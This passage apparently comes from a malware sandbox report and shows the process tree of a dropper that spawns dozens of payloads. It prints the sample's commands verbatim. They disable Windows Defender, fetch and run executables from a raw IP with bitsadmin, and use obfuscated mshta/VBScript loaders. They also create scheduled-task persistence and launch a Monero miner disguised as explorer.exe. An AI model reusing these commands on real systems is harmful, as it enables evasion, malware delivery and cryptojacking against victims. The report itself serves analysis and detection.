- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2352

C:\Users\Admin\AppData\Local\Temp\7zS039260E3\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS039260E3\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:984

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
4⤵
- Suspicious use of WriteProcessMemory
PID:1512

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
4⤵
- Suspicious use of WriteProcessMemory
PID:1400

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu13e7fdac52793516f.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:1860

C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu13e7fdac52793516f.exe
Thu13e7fdac52793516f.exe
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4044

C:\Users\Admin\Pictures\Adobe Films\YcKQmqEjHGAUKmVb2NL0JK67.exe
"C:\Users\Admin\Pictures\Adobe Films\YcKQmqEjHGAUKmVb2NL0JK67.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4520

C:\Users\Admin\Pictures\Adobe Films\LwVHajQxuIH7xPMasrDwRCoJ.exe
"C:\Users\Admin\Pictures\Adobe Films\LwVHajQxuIH7xPMasrDwRCoJ.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5240

C:\Users\Admin\Pictures\Adobe Films\LwVHajQxuIH7xPMasrDwRCoJ.exe
"C:\Users\Admin\Pictures\Adobe Films\LwVHajQxuIH7xPMasrDwRCoJ.exe"
7⤵
- Executes dropped EXE
PID:4372

C:\Users\Admin\Pictures\Adobe Films\n_J6D_QxAQKoyv9JFjlZw5cR.exe
"C:\Users\Admin\Pictures\Adobe Films\n_J6D_QxAQKoyv9JFjlZw5cR.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5272

C:\Users\Admin\Pictures\Adobe Films\x3OtjDAFNjre3U_c_KxiDM_Y.exe
"C:\Users\Admin\Pictures\Adobe Films\x3OtjDAFNjre3U_c_KxiDM_Y.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:5364

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
7⤵
PID:5956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5364 -s 548
7⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1176

C:\Users\Admin\Pictures\Adobe Films\Ur7zll7Iws3vwCj6dYYyk0zp.exe
"C:\Users\Admin\Pictures\Adobe Films\Ur7zll7Iws3vwCj6dYYyk0zp.exe"
6⤵
- Executes dropped EXE
PID:5356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 296
7⤵
- Program crash
PID:2248

C:\Users\Admin\Pictures\Adobe Films\2QQMp28QCeqYImd7XcL8AKOb.exe
"C:\Users\Admin\Pictures\Adobe Films\2QQMp28QCeqYImd7XcL8AKOb.exe"
6⤵
- Executes dropped EXE
PID:5336

C:\Users\Admin\Pictures\Adobe Films\if8DNtponwYMZn_lrw_gH9IF.exe
"C:\Users\Admin\Pictures\Adobe Films\if8DNtponwYMZn_lrw_gH9IF.exe"
6⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies system certificate store
PID:5328

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
7⤵
- Creates scheduled task(s)
PID:3260

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
7⤵
- Creates scheduled task(s)
PID:4656

C:\Users\Admin\Documents\oInNz7rcaMAqZU88AEzd04J6.exe
"C:\Users\Admin\Documents\oInNz7rcaMAqZU88AEzd04J6.exe"
7⤵
- Executes dropped EXE
PID:4036

C:\Users\Admin\Pictures\Adobe Films\OgZQOAFE1VRDNR92nNCQhrER.exe
"C:\Users\Admin\Pictures\Adobe Films\OgZQOAFE1VRDNR92nNCQhrER.exe"
8⤵
- Executes dropped EXE
PID:3808

C:\Users\Admin\Pictures\Adobe Films\BpcsEeqEvm1L1jBwjkb_ljG4.exe
"C:\Users\Admin\Pictures\Adobe Films\BpcsEeqEvm1L1jBwjkb_ljG4.exe"
8⤵
PID:1236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1236 -s 288
9⤵
- Program crash
PID:3500

C:\Users\Admin\Pictures\Adobe Films\Bo6hM0TWv3R06WBAt4FQcTb7.exe
"C:\Users\Admin\Pictures\Adobe Films\Bo6hM0TWv3R06WBAt4FQcTb7.exe"
8⤵
PID:2244

C:\Users\Admin\Pictures\Adobe Films\JovvV91HGm0RmxGj8dpqPad1.exe
"C:\Users\Admin\Pictures\Adobe Films\JovvV91HGm0RmxGj8dpqPad1.exe"
8⤵
PID:4864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 276
9⤵
- Program crash
PID:3220

C:\Users\Admin\Pictures\Adobe Films\xJgVmfIhKjtWL6432nC1M2Av.exe
"C:\Users\Admin\Pictures\Adobe Films\xJgVmfIhKjtWL6432nC1M2Av.exe"
8⤵
PID:3624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3624 -s 2156
9⤵
- Program crash
PID:4452

C:\Users\Admin\Pictures\Adobe Films\aU3eFmIjRslzcKiF8yPSGl0T.exe
"C:\Users\Admin\Pictures\Adobe Films\aU3eFmIjRslzcKiF8yPSGl0T.exe"
8⤵
PID:4828

C:\Users\Admin\Pictures\Adobe Films\aU3eFmIjRslzcKiF8yPSGl0T.exe
"C:\Users\Admin\Pictures\Adobe Films\aU3eFmIjRslzcKiF8yPSGl0T.exe" -u
9⤵
PID:4220

C:\Users\Admin\Pictures\Adobe Films\DA7uDPr0IIH5dzPGyJJGTsa6.exe
"C:\Users\Admin\Pictures\Adobe Films\DA7uDPr0IIH5dzPGyJJGTsa6.exe"
8⤵
PID:448

C:\Users\Admin\AppData\Local\Temp\is-975DO.tmp\DA7uDPr0IIH5dzPGyJJGTsa6.tmp
"C:\Users\Admin\AppData\Local\Temp\is-975DO.tmp\DA7uDPr0IIH5dzPGyJJGTsa6.tmp" /SL5="$80320,506127,422400,C:\Users\Admin\Pictures\Adobe Films\DA7uDPr0IIH5dzPGyJJGTsa6.exe"
9⤵
PID:752

C:\Users\Admin\AppData\Local\Temp\is-R2IIB.tmp\lakazet.exe
"C:\Users\Admin\AppData\Local\Temp\is-R2IIB.tmp\lakazet.exe" /S /UID=2709
10⤵
PID:5792

C:\Users\Admin\AppData\Local\Temp\47-681d3-f08-5048f-03cfa80c8237a\Lilezhevula.exe
"C:\Users\Admin\AppData\Local\Temp\47-681d3-f08-5048f-03cfa80c8237a\Lilezhevula.exe"
11⤵
PID:4676

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gsooj1f0.2q5\installer.exe /qn CAMPAIGN="654" & exit
12⤵
PID:6744

C:\Users\Admin\AppData\Local\Temp\gsooj1f0.2q5\installer.exe
C:\Users\Admin\AppData\Local\Temp\gsooj1f0.2q5\installer.exe /qn CAMPAIGN="654"
13⤵
PID:7096

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\gsooj1f0.2q5\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\gsooj1f0.2q5\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630507832 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
14⤵
PID:10608

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\enogvlxl.wyd\any.exe & exit
12⤵
PID:6828

C:\Users\Admin\AppData\Local\Temp\enogvlxl.wyd\any.exe
C:\Users\Admin\AppData\Local\Temp\enogvlxl.wyd\any.exe
13⤵
PID:7656

C:\Users\Admin\AppData\Local\Temp\enogvlxl.wyd\any.exe
"C:\Users\Admin\AppData\Local\Temp\enogvlxl.wyd\any.exe" -u
14⤵
PID:8092

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mlj24ptp.abt\autosubplayer.exe /S & exit
12⤵
PID:6920

C:\Users\Admin\Pictures\Adobe Films\4H1Pw9_vM1wpaM_H01xY6npk.exe
"C:\Users\Admin\Pictures\Adobe Films\4H1Pw9_vM1wpaM_H01xY6npk.exe"
8⤵
PID:1108

C:\Users\Admin\Pictures\Adobe Films\7X_v7kiWAsd9acBo_qe0f0sh.exe
"C:\Users\Admin\Pictures\Adobe Films\7X_v7kiWAsd9acBo_qe0f0sh.exe"
6⤵
- Executes dropped EXE
PID:5316

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer TestJob0 /download /priority high http://167.99.39.23/hoetnaca/exps/Bt.mp4 "%temp%\Settings.exe" && "%temp%\Settings.exe"
7⤵
PID:5232

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer TestJob0 /download /priority high http://167.99.39.23/hoetnaca/exps/Bt.mp4 "C:\Users\Admin\AppData\Local\Temp\Settings.exe"
8⤵
- Download via BitsAdmin
PID:5288

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer TestJob1 /download /priority high http://167.99.39.23/hoetnaca/exps/St.mp4 "%temp%\Microsoft.exe" && "%temp%\Microsoft.exe"
7⤵
PID:1844

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer TestJob1 /download /priority high http://167.99.39.23/hoetnaca/exps/St.mp4 "C:\Users\Admin\AppData\Local\Temp\Microsoft.exe"
8⤵
- Download via BitsAdmin
PID:2008

C:\Users\Admin\Pictures\Adobe Films\9Iiqia2MYzTlKWePDc1JfqzX.exe
"C:\Users\Admin\Pictures\Adobe Films\9Iiqia2MYzTlKWePDc1JfqzX.exe"
6⤵
PID:5300

C:\Users\Admin\Pictures\Adobe Films\8xHppuniu0MALnm_wFkWCK_Z.exe
"C:\Users\Admin\Pictures\Adobe Films\8xHppuniu0MALnm_wFkWCK_Z.exe"
6⤵
- Executes dropped EXE
PID:5492

C:\Users\Admin\Pictures\Adobe Films\YZ1saexS6xtcCaStgSRIG6QD.exe
"C:\Users\Admin\Pictures\Adobe Films\YZ1saexS6xtcCaStgSRIG6QD.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5484

C:\Users\Admin\Pictures\Adobe Films\YZ1saexS6xtcCaStgSRIG6QD.exe
"C:\Users\Admin\Pictures\Adobe Films\YZ1saexS6xtcCaStgSRIG6QD.exe"
7⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:796

C:\Users\Admin\Pictures\Adobe Films\TQJKKsY8bnpKyCSGDiZQru1v.exe
"C:\Users\Admin\Pictures\Adobe Films\TQJKKsY8bnpKyCSGDiZQru1v.exe"
6⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:5476

C:\Users\Admin\Pictures\Adobe Films\jB2kNKEYscJ3R8GN47isBy_l.exe
"C:\Users\Admin\Pictures\Adobe Films\jB2kNKEYscJ3R8GN47isBy_l.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5452

C:\Users\Admin\Pictures\Adobe Films\LsWeS0ozWjk8helLOsfpf_UJ.exe
"C:\Users\Admin\Pictures\Adobe Films\LsWeS0ozWjk8helLOsfpf_UJ.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
PID:5444

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
7⤵
PID:1592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5444 -s 560
7⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:5852

C:\Users\Admin\Pictures\Adobe Films\2HRg5KX7zmkAK_35aSkrzi2s.exe
"C:\Users\Admin\Pictures\Adobe Films\2HRg5KX7zmkAK_35aSkrzi2s.exe"
6⤵
- Executes dropped EXE
PID:5436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5436 -s 280
7⤵
- Program crash
PID:5596

C:\Users\Admin\Pictures\Adobe Films\wJr4YhTOhL6hRuB9JEQQpWXL.exe
"C:\Users\Admin\Pictures\Adobe Films\wJr4YhTOhL6hRuB9JEQQpWXL.exe"
6⤵
PID:5420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5420 -s 2360
7⤵
- Program crash
PID:3836

C:\Users\Admin\Pictures\Adobe Films\NHA6vXgyfknAZeEsU5CDfx8R.exe
"C:\Users\Admin\Pictures\Adobe Films\NHA6vXgyfknAZeEsU5CDfx8R.exe"
6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5412

C:\Users\Admin\Pictures\Adobe Films\uLtaKf_vTMMMjMFJtASoQoo4.exe
"C:\Users\Admin\Pictures\Adobe Films\uLtaKf_vTMMMjMFJtASoQoo4.exe"
6⤵
- Executes dropped EXE
PID:5404

C:\Users\Admin\Pictures\Adobe Films\wkzYKAhydGq3upqrOzF0lD0i.exe
"C:\Users\Admin\Pictures\Adobe Films\wkzYKAhydGq3upqrOzF0lD0i.exe"
6⤵
PID:5396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5396 -s 280
7⤵
- Program crash
PID:5720

C:\Users\Admin\Pictures\Adobe Films\0YApp39f0bRIeIddIlDOZp7j.exe
"C:\Users\Admin\Pictures\Adobe Films\0YApp39f0bRIeIddIlDOZp7j.exe"
6⤵
- Executes dropped EXE
PID:5664

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5664 -s 276
7⤵
- Program crash
PID:5220

C:\Users\Admin\Pictures\Adobe Films\0BW9TiJU14SQZRmxlj5jtV_P.exe
"C:\Users\Admin\Pictures\Adobe Films\0BW9TiJU14SQZRmxlj5jtV_P.exe"
6⤵
- Executes dropped EXE
PID:3544

C:\Users\Admin\AppData\Local\Temp\is-4VEDD.tmp\0BW9TiJU14SQZRmxlj5jtV_P.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4VEDD.tmp\0BW9TiJU14SQZRmxlj5jtV_P.tmp" /SL5="$201CA,506127,422400,C:\Users\Admin\Pictures\Adobe Films\0BW9TiJU14SQZRmxlj5jtV_P.exe"
7⤵
PID:2876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu13f11af06b.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2252

C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu13f11af06b.exe
Thu13f11af06b.exe
5⤵
PID:4396

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu13a8cbc236137c.exe
4⤵
PID:1692

C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu13a8cbc236137c.exe
Thu13a8cbc236137c.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3348

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
6⤵
- Executes dropped EXE
PID:4328

C:\Users\Admin\AppData\Local\Temp\chrome.exe
"C:\Users\Admin\AppData\Local\Temp\chrome.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2988

C:\Users\Admin\AppData\Local\Temp\PBrowserSetp42415.exe
"C:\Users\Admin\AppData\Local\Temp\PBrowserSetp42415.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2112

C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe
"C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"
7⤵
- Executes dropped EXE
PID:3932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 292
8⤵
- Program crash
PID:1056

C:\Users\Admin\AppData\Local\Temp\inst1.exe
"C:\Users\Admin\AppData\Local\Temp\inst1.exe"
7⤵
- Executes dropped EXE
PID:4532

C:\Users\Admin\AppData\Local\Temp\chrome update.exe
"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4760

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2388

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
8⤵
PID:2152

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
9⤵
PID:5264

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "search_hyperfs_206.exe"
10⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2460

C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
10⤵
- Executes dropped EXE
PID:6136

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
11⤵
PID:4608

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
12⤵
PID:3400

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
11⤵
PID:6112

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
12⤵
PID:2784

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
13⤵
- Blocklisted process makes network request
- Executes dropped EXE
PID:3716

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHo "
13⤵
PID:4224

C:\Windows\SysWOW64\msiexec.exe
msiexec -Y ..\lXQ2g.WC
13⤵
PID:2864

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
7⤵
- Executes dropped EXE
PID:1272

C:\Users\Admin\AppData\Local\Temp\xfzhang-game.exe
"C:\Users\Admin\AppData\Local\Temp\xfzhang-game.exe"
7⤵
- Executes dropped EXE
PID:3212

C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3432

C:\Users\Admin\AppData\Local\Temp\chrome1.exe
"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2028

C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5796

C:\Users\Admin\AppData\Local\Temp\chrome3.exe
"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5460

C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
7⤵
- Executes dropped EXE
PID:2912

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
8⤵
PID:4984

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
9⤵
PID:2168

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
10⤵
- Creates scheduled task(s)
PID:5556

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
9⤵
PID:5228

C:\Users\Admin\AppData\Roaming\services64.exe
C:\Users\Admin\AppData\Roaming\services64.exe
10⤵
PID:5380

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
11⤵
PID:2792

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
12⤵
PID:1528

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
13⤵
PID:9484

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
12⤵
PID:5472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu13ce386e385.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2280

C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu13ce386e385.exe
Thu13ce386e385.exe
5⤵
- Executes dropped EXE
PID:3208

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscriPt: ClOsE (cReaTeObJECt ( "WsCRIpT.SHeLl" ).run("cMd /q /R tyPe ""C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu13ce386e385.exe"" > ..\Kz4mLc.ExE && Start ..\Kz4mLC.Exe -Pnxy5pXvI8SWjtAt3 & If """" =="""" for %Y in ( ""C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu13ce386e385.exe"" ) do taskkill -f /iM ""%~nXY"" " ,0,True ))
6⤵
PID:2480

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu13045a98310.exe
4⤵
PID:4488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu133bd09ec4755.exe
4⤵
PID:4968

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu13fba7be709523c0e.exe
4⤵
PID:3132

C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu13fba7be709523c0e.exe
Thu13fba7be709523c0e.exe
5⤵
PID:4792

C:\Users\Admin\AppData\Local\Temp\is-VSJQ5.tmp\Thu13fba7be709523c0e.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VSJQ5.tmp\Thu13fba7be709523c0e.tmp" /SL5="$20208,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zS039260E3\Thu13fba7be709523c0e.exe"
6⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:2704

C:\Program Files (x86)\Gparted\Build.sfx.exe
"C:\Program Files (x86)\Gparted\Build.sfx.exe" -p123 -s1
7⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4716

C:\Program Files (x86)\Gparted\Build.exe
"C:\Program Files (x86)\Gparted\Build.exe"
8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3284

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.bing.com
9⤵
PID:4892

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.yahoo.com
9⤵
PID:8220

C:\Users\Admin\AppData\Local\Temp\Build.exe
C:\Users\Admin\AppData\Local\Temp\Build.exe
9⤵
PID:12300

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1B8Un7
10⤵
PID:13504

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
